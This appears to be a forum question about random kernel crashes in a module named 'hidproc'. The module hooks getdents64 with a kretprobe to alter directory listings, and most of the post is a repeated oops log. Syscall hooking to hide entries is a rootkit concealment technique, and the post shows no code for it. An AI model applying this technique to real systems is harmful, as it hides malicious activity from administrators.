Random crashes in kretprobe on getdents()

I’m trying to learn Linux kernel programming and following and redoing some existing projects that I find interesting. In this case I tried to modify the data that is being returned by getdents() by hooking it with kretprobe.

I could do that successfully, and managed to modify the data but I start to get some random crashes! Below is the crash log I’m getting,

Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
<code>Jun 21 08:05:39 xubun2204 kernel: [ 1413.166586] audit: type=1400 audit(1718953539.095:66): apparmor="DENIED" operation="capable" profile="/usr/lib/snapd/snap-confine" pid=4333 comm="snap-confine" capability=12 capname="net_admin"
Jun 21 08:05:39 xubun2204 kernel: [ 1413.166593] audit: type=1400 audit(1718953539.095:67): apparmor="DENIED" operation="capable" profile="/usr/lib/snapd/snap-confine" pid=4333 comm="snap-confine" capability=38 capname="perfmon"
Jun 21 08:05:39 xubun2204 kernel: [ 1413.953050] audit: type=1107 audit(1718953539.883:68): pid=747 uid=102 auid=4294967295 ses=4294967295 subj=unconfined msg='apparmor="DENIED" operation="dbus_method_call" bus="system" path="/org/freedesktop/timedate1" interface="org.freedesktop.DBus.Properties" member="GetAll" mask="send" name=":1.128" pid=4333 label="snap.firefox.firefox" peer_pid=4511 peer_label="unconfined"
Jun 21 08:05:39 xubun2204 kernel: [ 1413.953050] exe="/usr/bin/dbus-daemon" sauid=102 hostname=? addr=? terminal=?'
Jun 21 08:05:39 xubun2204 kernel: [ 1413.953564] audit: type=1107 audit(1718953539.883:69): pid=747 uid=102 auid=4294967295 ses=4294967295 subj=unconfined msg='apparmor="DENIED" operation="dbus_method_call" bus="system" path="/org/freedesktop/timedate1" interface="org.freedesktop.DBus.Properties" member="GetAll" mask="send" name=":1.128" pid=4333 label="snap.firefox.firefox" peer_pid=4511 peer_label="unconfined"
Jun 21 08:05:39 xubun2204 kernel: [ 1413.953564] exe="/usr/bin/dbus-daemon" sauid=102 hostname=? addr=? terminal=?'
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048570] BUG: kernel NULL pointer dereference, address: 0000000000000018
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048576] #PF: supervisor read access in kernel mode
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048578] #PF: error_code(0x0000) - not-present page
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048580] PGD 0 P4D 0
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048583] Oops: 0000 [#2] SMP NOPTI
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048585] CPU: 2 PID: 4837 Comm: code Tainted: G D OE 5.15.0-112-generic #122-Ubuntu
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048588] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 11/12/2020
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048590] RIP: 0010:handler_ret_getdents64+0xe9/0x240 [hidproc]
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048596] Code: 00 00 4d 85 ff 0f 8e 48 01 00 00 65 48 8b 04 25 c0 fb 01 00 48 8b 80 00 0c 00 00 45 31 c0 48 8b 40 20 48 8b 40 08 48 8b 04 d8 <48> 8b 40 18 48 8b 40 30 48 83 78 40 01 0f 84 c1 00 00 00 4c 89 e0
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048598] RSP: 0018:ffffa5594520fd30 EFLAGS: 00010246
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048600] RAX: 0000000000000000 RBX: 0000000000000026 RCX: 0000000000000000
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048602] RDX: 0000000000008000 RSI: 00003c3400aec030 RDI: ffff8d5eb9660000
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048603] RBP: ffffa5594520fd70 R08: 0000000000000000 R09: 0000000000000008
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048604] R10: 0000000000000246 R11: ffff8d5f35eb8760 R12: ffff8d5eb9658000
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048606] R13: 0000000000008000 R14: 00000000000000d0 R15: 00000000000000d0
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048607] FS: 00007faa617cd640(0000) GS:ffff8d5f35e80000(0000) knlGS:0000000000000000
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048609] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048610] CR2: 0000000000000018 CR3: 00000001e0c94000 CR4: 0000000000750ee0
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048625] PKRU: 55555554
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048626] Call Trace:
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048628] <TASK>
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048629] ? srso_alias_return_thunk+0x5/0x7f
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048634] ? show_trace_log_lvl+0x28e/0x2ea
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048637] ? show_trace_log_lvl+0x28e/0x2ea
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048641] ? __kretprobe_trampoline_handler+0xb4/0x140
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048646] ? show_regs.part.0+0x23/0x29
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048647] ? __die_body.cold+0x8/0xd
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048649] ? __die+0x2b/0x37
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048651] ? page_fault_oops+0x13b/0x170
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048655] ? do_user_addr_fault+0x321/0x670
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048658] ? exc_page_fault+0x77/0x170
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048661] ? asm_exc_page_fault+0x27/0x30
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048666] ? handler_ret_getdents64+0xe9/0x240 [hidproc]
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048669] ? x64_sys_call+0xf63/0x1fa0
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048672] __kretprobe_trampoline_handler+0xb4/0x140
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048675] trampoline_handler+0x41/0x60
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048677] __kretprobe_trampoline+0x2a/0x60
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048679] RIP: 0010:__kretprobe_trampoline+0x0/0x60
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048680] Code: 89 fc e8 a3 d8 01 00 4c 89 f2 4c 89 ee 4c 89 e7 44 0f b6 c0 31 c9 e8 6f a2 3b 00 41 5c 41 5d 41 5e 5d e9 93 ce f6 00 cc cc cc <54> 9c 48 83 ec 18 57 56 52 51 50 41 50 41 51 41 52 41 53 53 55 41
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048682] RSP: 4520ff48:ffffa5594520fe78 EFLAGS: 00000246
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048684] RAX: 00000000000000d0 RBX: 0000000000000000 RCX: 0000000000000000
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048685] RDX: 0000000000000000 RSI: 0000000000000001 RDI: ffff8d5e8a8a1700
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048686] RBP: ffffa5594520fe78 R08: ffff8d5e152a0800 R09: ffff8d5e8c595cf8
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048688] R10: 0000000000000001 R11: 0000000040000001 R12: ffffa5594520ff58
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048689] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048692] ? do_syscall_64+0x56/0xb0
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048694] ? handle_mm_fault+0xd8/0x2c0
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048698] ? srso_alias_return_thunk+0x5/0x7f
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048700] ? do_user_addr_fault+0x1e7/0x670
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048702] ? __x64_sys_openat+0x55/0x90
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048707] ? srso_alias_return_thunk+0x5/0x7f
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048709] ? exit_to_user_mode_prepare+0x37/0xb0
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048717] ? srso_alias_return_thunk+0x5/0x7f
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048718] ? irqentry_exit_to_user_mode+0x17/0x20
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048720] ? srso_alias_return_thunk+0x5/0x7f
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048722] ? irqentry_exit+0x1d/0x30
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048723] ? srso_alias_return_thunk+0x5/0x7f
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048725] ? exc_page_fault+0x89/0x170
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048727] ? entry_SYSCALL_64_after_hwframe+0x67/0xd1
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048732] </TASK>
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048734] Modules linked in: hidproc(E) intel_rapl_msr intel_rapl_common vsock_loopback vmw_vsock_virtio_transport_common kvm_amd ccp vmw_vsock_vmci_transport vmw_balloon vsock kvm crct10dif_pclmul ghash_clmulni_intel snd_ens1371 sha256_ssse3 sha1_ssse3 binfmt_misc snd_ac97_codec gameport aesni_intel ac97_bus crypto_simd cryptd snd_pcm snd_seq_midi snd_seq_midi_event snd_rawmidi nls_iso8859_1 input_leds snd_seq joydev serio_raw snd_seq_device snd_timer snd soundcore vmw_vmci mac_hid sch_fq_codel vmwgfx ttm drm_kms_helper cec rc_core fb_sys_fops syscopyarea sysfillrect sysimgblt msr parport_pc ppdev lp parport drm efi_pstore ip_tables x_tables autofs4 hid_generic usbhid hid crc32_pclmul mptspi mptscsih psmouse mptbase ahci libahci scsi_transport_spi i2c_piix4 e1000 pata_acpi [last unloaded: rootkit]
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048796] CR2: 0000000000000018
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048798] ---[ end trace ed478a6b988e964c ]---
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048799] RIP: 0010:handler_ret_getdents64+0xe9/0x240 [hidproc]
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048802] Code: 00 00 4d 85 ff 0f 8e 48 01 00 00 65 48 8b 04 25 c0 fb 01 00 48 8b 80 00 0c 00 00 45 31 c0 48 8b 40 20 48 8b 40 08 48 8b 04 d8 <48> 8b 40 18 48 8b 40 30 48 83 78 40 01 0f 84 c1 00 00 00 4c 89 e0
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048804] RSP: 0018:ffffa55945733da8 EFLAGS: 00010246
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048806] RAX: 0000000000000000 RBX: 0000000000000016 RCX: 0000000000000000
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048807] RDX: 0000000000000800 RSI: 00007f31727ca238 RDI: ffff8d5e0c665000
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048809] RBP: ffffa55945733de8 R08: 0000000000000000 R09: ffff8d5e0c664800
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048810] R10: 0000000000000001 R11: 0000000040000001 R12: ffff8d5e0c664800
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048811] R13: 0000000000000800 R14: 0000000000000080 R15: 0000000000000080
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048813] FS: 00007faa617cd640(0000) GS:ffff8d5f35e80000(0000) knlGS:0000000000000000
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048814] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048816] CR2: 0000000000000018 CR3: 00000001e0c94000 CR4: 0000000000750ee0
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048846] PKRU: 55555554
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141480] BUG: kernel NULL pointer dereference, address: 0000000000000018
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141485] #PF: supervisor read access in kernel mode
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141487] #PF: error_code(0x0000) - not-present page
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141489] PGD 0 P4D 0
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141492] Oops: 0000 [#3] SMP NOPTI
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141494] CPU: 1 PID: 4836 Comm: code Tainted: G D OE 5.15.0-112-generic #122-Ubuntu
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141498] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 11/12/2020
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141500] RIP: 0010:handler_ret_getdents64+0xe9/0x240 [hidproc]
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141506] Code: 00 00 4d 85 ff 0f 8e 48 01 00 00 65 48 8b 04 25 c0 fb 01 00 48 8b 80 00 0c 00 00 45 31 c0 48 8b 40 20 48 8b 40 08 48 8b 04 d8 <48> 8b 40 18 48 8b 40 30 48 83 78 40 01 0f 84 c1 00 00 00 4c 89 e0
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141508] RSP: 0018:ffffa559451ffcf0 EFLAGS: 00010246
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141510] RAX: 0000000000000000 RBX: 0000000000000032 RCX: 0000000000000000
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141512] RDX: 0000000000008000 RSI: 00003c34012dc030 RDI: ffff8d5ec33d0000
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141513] RBP: ffffa559451ffd30 R08: 0000000000000000 R09: 0000000000000008
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141514] R10: 0000000000000246 R11: ffff8d5f35e78760 R12: ffff8d5ec33c8000
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141516] R13: 0000000000008000 R14: 00000000000000c8 R15: 00000000000000c8
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141517] FS: 00007faa61fce640(0000) GS:ffff8d5f35e40000(0000) knlGS:0000000000000000
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141519] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141520] CR2: 0000000000000018 CR3: 00000001e0c94000 CR4: 0000000000750ee0
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141534] PKRU: 55555554
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141535] Call Trace:
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141537] <TASK>
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141538] ? srso_alias_return_thunk+0x5/0x7f
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141542] ? show_trace_log_lvl+0x28e/0x2ea
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141546] ? show_trace_log_lvl+0x28e/0x2ea
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141550] ? __kretprobe_trampoline_handler+0xb4/0x140
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141554] ? show_regs.part.0+0x23/0x29
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141555] ? __die_body.cold+0x8/0xd
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141557] ? __die+0x2b/0x37
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141559] ? page_fault_oops+0x13b/0x170
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141563] ? do_user_addr_fault+0x321/0x670
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141566] ? exc_page_fault+0x77/0x170
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141569] ? asm_exc_page_fault+0x27/0x30
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141574] ? handler_ret_getdents64+0xe9/0x240 [hidproc]
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141576] ? x64_sys_call+0xf63/0x1fa0
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141580] __kretprobe_trampoline_handler+0xb4/0x140
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141582] trampoline_handler+0x41/0x60
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141585] __kretprobe_trampoline+0x2a/0x60
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141587] RIP: 0010:__kretprobe_trampoline+0x0/0x60
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141589] Code: 89 fc e8 a3 d8 01 00 4c 89 f2 4c 89 ee 4c 89 e7 44 0f b6 c0 31 c9 e8 6f a2 3b 00 41 5c 41 5d 41 5e 5d e9 93 ce f6 00 cc cc cc <54> 9c 48 83 ec 18 57 56 52 51 50 41 50 41 51 41 52 41 53 53 55 41
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141590] RSP: 451fff48:ffffa559451ffe38 EFLAGS: 00000246
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141592] RAX: 00000000000000c8 RBX: 0000000000000000 RCX: 0000000000000000
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141593] RDX: 0000000000000000 RSI: 0000000000000001 RDI: ffff8d5e8983a900
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141594] RBP: ffffa559451ffe38 R08: ffff8d5e152a0800 R09: ffff8d5e8c596628
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141596] R10: 0000000000000001 R11: 0000000040000001 R12: ffffa559451fff58
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141597] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141600] ? do_syscall_64+0x56/0xb0
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141603] ? srso_alias_return_thunk+0x5/0x7f
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141605] ? exit_to_user_mode_prepare+0x37/0xb0
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141608] ? srso_alias_return_thunk+0x5/0x7f
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141610] ? syscall_exit_to_user_mode+0x35/0x50
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141612] ? x64_sys_call+0x1a81/0x1fa0
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141614] ? srso_alias_return_thunk+0x5/0x7f
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141615] ? do_syscall_64+0x63/0xb0
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141617] ? srso_alias_return_thunk+0x5/0x7f
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141619] ? __x64_sys_openat+0x55/0x90
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141622] ? srso_alias_return_thunk+0x5/0x7f
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141624] ? exit_to_user_mode_prepare+0x37/0xb0
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141626] ? srso_alias_return_thunk+0x5/0x7f
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141628] ? syscall_exit_to_user_mode+0x35/0x50
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141629] ? x64_sys_call+0x1a55/0x1fa0
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141631] ? srso_alias_return_thunk+0x5/0x7f
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141633] ? do_syscall_64+0x63/0xb0
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141635] ? do_syscall_64+0x63/0xb0
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141637] ? x64_sys_call+0x1022/0x1fa0
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141639] ? srso_alias_return_thunk+0x5/0x7f
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141640] ? do_syscall_64+0x63/0xb0
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141643] ? entry_SYSCALL_64_after_hwframe+0x67/0xd1
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141646] </TASK>
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141648] Modules linked in: hidproc(E) intel_rapl_msr intel_rapl_common vsock_loopback vmw_vsock_virtio_transport_common kvm_amd ccp vmw_vsock_vmci_transport vmw_balloon vsock kvm crct10dif_pclmul ghash_clmulni_intel snd_ens1371 sha256_ssse3 sha1_ssse3 binfmt_misc snd_ac97_codec gameport aesni_intel ac97_bus crypto_simd cryptd snd_pcm snd_seq_midi snd_seq_midi_event snd_rawmidi nls_iso8859_1 input_leds snd_seq joydev serio_raw snd_seq_device snd_timer snd soundcore vmw_vmci mac_hid sch_fq_codel vmwgfx ttm drm_kms_helper cec rc_core fb_sys_fops syscopyarea sysfillrect sysimgblt msr parport_pc ppdev lp parport drm efi_pstore ip_tables x_tables autofs4 hid_generic usbhid hid crc32_pclmul mptspi mptscsih psmouse mptbase ahci libahci scsi_transport_spi i2c_piix4 e1000 pata_acpi [last unloaded: rootkit]
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141704] CR2: 0000000000000018
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141706] ---[ end trace ed478a6b988e964d ]---
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141707] RIP: 0010:handler_ret_getdents64+0xe9/0x240 [hidproc]
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141709] Code: 00 00 4d 85 ff 0f 8e 48 01 00 00 65 48 8b 04 25 c0 fb 01 00 48 8b 80 00 0c 00 00 45 31 c0 48 8b 40 20 48 8b 40 08 48 8b 04 d8 <48> 8b 40 18 48 8b 40 30 48 83 78 40 01 0f 84 c1 00 00 00 4c 89 e0
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141711] RSP: 0018:ffffa55945733da8 EFLAGS: 00010246
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141713] RAX: 0000000000000000 RBX: 0000000000000016 RCX: 0000000000000000
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141714] RDX: 0000000000000800 RSI: 00007f31727ca238 RDI: ffff8d5e0c665000
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141715] RBP: ffffa55945733de8 R08: 0000000000000000 R09: ffff8d5e0c664800
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141716] R10: 0000000000000001 R11: 0000000040000001 R12: ffff8d5e0c664800
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141718] R13: 0000000000000800 R14: 0000000000000080 R15: 0000000000000080
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141719] FS: 00007faa61fce640(0000) GS:ffff8d5f35e40000(0000) knlGS:0000000000000000
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141720] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141722] CR2: 0000000000000018 CR3: 00000001e0c94000 CR4: 0000000000750ee0
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141733] PKRU: 55555554
</code>
<code>Jun 21 08:05:39 xubun2204 kernel: [ 1413.166586] audit: type=1400 audit(1718953539.095:66): apparmor="DENIED" operation="capable" profile="/usr/lib/snapd/snap-confine" pid=4333 comm="snap-confine" capability=12 capname="net_admin" Jun 21 08:05:39 xubun2204 kernel: [ 1413.166593] audit: type=1400 audit(1718953539.095:67): apparmor="DENIED" operation="capable" profile="/usr/lib/snapd/snap-confine" pid=4333 comm="snap-confine" capability=38 capname="perfmon" Jun 21 08:05:39 xubun2204 kernel: [ 1413.953050] audit: type=1107 audit(1718953539.883:68): pid=747 uid=102 auid=4294967295 ses=4294967295 subj=unconfined msg='apparmor="DENIED" operation="dbus_method_call" bus="system" path="/org/freedesktop/timedate1" interface="org.freedesktop.DBus.Properties" member="GetAll" mask="send" name=":1.128" pid=4333 label="snap.firefox.firefox" peer_pid=4511 peer_label="unconfined" Jun 21 08:05:39 xubun2204 kernel: [ 1413.953050] exe="/usr/bin/dbus-daemon" sauid=102 hostname=? addr=? terminal=?' Jun 21 08:05:39 xubun2204 kernel: [ 1413.953564] audit: type=1107 audit(1718953539.883:69): pid=747 uid=102 auid=4294967295 ses=4294967295 subj=unconfined msg='apparmor="DENIED" operation="dbus_method_call" bus="system" path="/org/freedesktop/timedate1" interface="org.freedesktop.DBus.Properties" member="GetAll" mask="send" name=":1.128" pid=4333 label="snap.firefox.firefox" peer_pid=4511 peer_label="unconfined" Jun 21 08:05:39 xubun2204 kernel: [ 1413.953564] exe="/usr/bin/dbus-daemon" sauid=102 hostname=? addr=? terminal=?' Jun 21 08:05:42 xubun2204 kernel: [ 1417.048570] BUG: kernel NULL pointer dereference, address: 0000000000000018 Jun 21 08:05:42 xubun2204 kernel: [ 1417.048576] #PF: supervisor read access in kernel mode Jun 21 08:05:42 xubun2204 kernel: [ 1417.048578] #PF: error_code(0x0000) - not-present page Jun 21 08:05:42 xubun2204 kernel: [ 1417.048580] PGD 0 P4D 0 Jun 21 08:05:42 xubun2204 kernel: [ 1417.048583] Oops: 0000 [#2] SMP NOPTI Jun 21 08:05:42 xubun2204 kernel: [ 1417.048585] CPU: 2 PID: 4837 Comm: code Tainted: G D OE 5.15.0-112-generic #122-Ubuntu Jun 21 08:05:42 xubun2204 kernel: [ 1417.048588] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 11/12/2020 Jun 21 08:05:42 xubun2204 kernel: [ 1417.048590] RIP: 0010:handler_ret_getdents64+0xe9/0x240 [hidproc] Jun 21 08:05:42 xubun2204 kernel: [ 1417.048596] Code: 00 00 4d 85 ff 0f 8e 48 01 00 00 65 48 8b 04 25 c0 fb 01 00 48 8b 80 00 0c 00 00 45 31 c0 48 8b 40 20 48 8b 40 08 48 8b 04 d8 <48> 8b 40 18 48 8b 40 30 48 83 78 40 01 0f 84 c1 00 00 00 4c 89 e0 Jun 21 08:05:42 xubun2204 kernel: [ 1417.048598] RSP: 0018:ffffa5594520fd30 EFLAGS: 00010246 Jun 21 08:05:42 xubun2204 kernel: [ 1417.048600] RAX: 0000000000000000 RBX: 0000000000000026 RCX: 0000000000000000 Jun 21 08:05:42 xubun2204 kernel: [ 1417.048602] RDX: 0000000000008000 RSI: 00003c3400aec030 RDI: ffff8d5eb9660000 Jun 21 08:05:42 xubun2204 kernel: [ 1417.048603] RBP: ffffa5594520fd70 R08: 0000000000000000 R09: 0000000000000008 Jun 21 08:05:42 xubun2204 kernel: [ 1417.048604] R10: 0000000000000246 R11: ffff8d5f35eb8760 R12: ffff8d5eb9658000 Jun 21 08:05:42 xubun2204 kernel: [ 1417.048606] R13: 0000000000008000 R14: 00000000000000d0 R15: 00000000000000d0 Jun 21 08:05:42 xubun2204 kernel: [ 1417.048607] FS: 00007faa617cd640(0000) GS:ffff8d5f35e80000(0000) knlGS:0000000000000000 Jun 21 08:05:42 xubun2204 kernel: [ 1417.048609] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 Jun 21 08:05:42 xubun2204 kernel: [ 1417.048610] CR2: 0000000000000018 CR3: 00000001e0c94000 CR4: 0000000000750ee0 Jun 21 08:05:42 xubun2204 kernel: [ 1417.048625] PKRU: 55555554 Jun 21 08:05:42 xubun2204 kernel: [ 1417.048626] Call Trace: Jun 21 08:05:42 xubun2204 kernel: [ 1417.048628] <TASK> Jun 21 08:05:42 xubun2204 kernel: [ 1417.048629] ? srso_alias_return_thunk+0x5/0x7f Jun 21 08:05:42 xubun2204 kernel: [ 1417.048634] ? show_trace_log_lvl+0x28e/0x2ea Jun 21 08:05:42 xubun2204 kernel: [ 1417.048637] ? show_trace_log_lvl+0x28e/0x2ea Jun 21 08:05:42 xubun2204 kernel: [ 1417.048641] ? __kretprobe_trampoline_handler+0xb4/0x140 Jun 21 08:05:42 xubun2204 kernel: [ 1417.048646] ? show_regs.part.0+0x23/0x29 Jun 21 08:05:42 xubun2204 kernel: [ 1417.048647] ? __die_body.cold+0x8/0xd Jun 21 08:05:42 xubun2204 kernel: [ 1417.048649] ? __die+0x2b/0x37 Jun 21 08:05:42 xubun2204 kernel: [ 1417.048651] ? page_fault_oops+0x13b/0x170 Jun 21 08:05:42 xubun2204 kernel: [ 1417.048655] ? do_user_addr_fault+0x321/0x670 Jun 21 08:05:42 xubun2204 kernel: [ 1417.048658] ? exc_page_fault+0x77/0x170 Jun 21 08:05:42 xubun2204 kernel: [ 1417.048661] ? asm_exc_page_fault+0x27/0x30 Jun 21 08:05:42 xubun2204 kernel: [ 1417.048666] ? handler_ret_getdents64+0xe9/0x240 [hidproc] Jun 21 08:05:42 xubun2204 kernel: [ 1417.048669] ? x64_sys_call+0xf63/0x1fa0 Jun 21 08:05:42 xubun2204 kernel: [ 1417.048672] __kretprobe_trampoline_handler+0xb4/0x140 Jun 21 08:05:42 xubun2204 kernel: [ 1417.048675] trampoline_handler+0x41/0x60 Jun 21 08:05:42 xubun2204 kernel: [ 1417.048677] __kretprobe_trampoline+0x2a/0x60 Jun 21 08:05:42 xubun2204 kernel: [ 1417.048679] RIP: 0010:__kretprobe_trampoline+0x0/0x60 Jun 21 08:05:42 xubun2204 kernel: [ 1417.048680] Code: 89 fc e8 a3 d8 01 00 4c 89 f2 4c 89 ee 4c 89 e7 44 0f b6 c0 31 c9 e8 6f a2 3b 00 41 5c 41 5d 41 5e 5d e9 93 ce f6 00 cc cc cc <54> 9c 48 83 ec 18 57 56 52 51 50 41 50 41 51 41 52 41 53 53 55 41 Jun 21 08:05:42 xubun2204 kernel: [ 1417.048682] 